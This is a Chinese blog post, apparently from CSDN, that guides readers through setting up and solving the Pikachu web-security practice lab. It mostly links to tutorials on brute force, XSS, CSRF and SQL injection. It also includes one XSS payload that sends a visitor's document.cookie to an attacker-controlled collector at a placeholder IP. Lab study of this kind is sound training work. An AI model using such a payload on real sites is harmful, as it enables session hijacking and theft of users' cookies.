pikachu靶场环境搭建指南&通关系列附带知识点(持续更新中)

前情提要

此文章用于解答疑惑与以后提升能力用,非全程操作教程。

正文

 教学视频:

地址:【web渗透入门靶场pikachu(高清)】

pikachu靶场

地址:https://github.com/zhuifengshaonianhanlu/pikachu

burp suite的四种 attack type(攻击类型)

地址:https://blog.csdn.net/qq_38632151/article/details/102600053

常用端口号大全

地址:https://blog.csdn.net/qq_43236906/article/details/109249050

关闭端口占用进程

地址:https://blog.csdn.net/qq_41153943/article/details/104734054

pikachu数据连接失败,请仔细检查inc/config.inc.php的配置解决方法。

地址:https://blog.csdn.net/m0_66588420/article/details/139119430

暴力破解

 基于前端的验证码绕过(On client)

基于服务器的验证码绕过(On server)

(未)Pikachu-XSS漏洞之cookie值获取、钓鱼结果和键盘记录实战记录

3-7、8、5、6

xss后台根据小破站up视频创建就好了,需要改些文件,相信聪明的你可以改好哈。

精简版教程:https://www.cnblogs.com/li2019/p/12650512.html

丰富版教程:使用pikachu管理工具下的XSS后台进行实战_pikachu xss后台

XSS(get型)之cookie值获取:

攻击代码:

<script>document.location = ‘http://xxx.xxx.xxx.xxx/Pikachu-master/pkxss/xcookie/cookie.php?cookie=’ + document.cookie;</script>

注意:http://xx.xx.xx.xx/Pikachu-master/    (xx.xx.xx.xx为自己的IP地址,  pikachu-master是路径名, 我的是http://192.168.xx.xx/Pikachu/ 

CSRF(跨站请求伪造漏洞)

CSRF Token

文章:CSRF漏洞原理攻击与防御(非常细)

SQL-Inject(SQL注入漏洞)
SQL-Inject漏洞原理概述

sqlmap:

SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值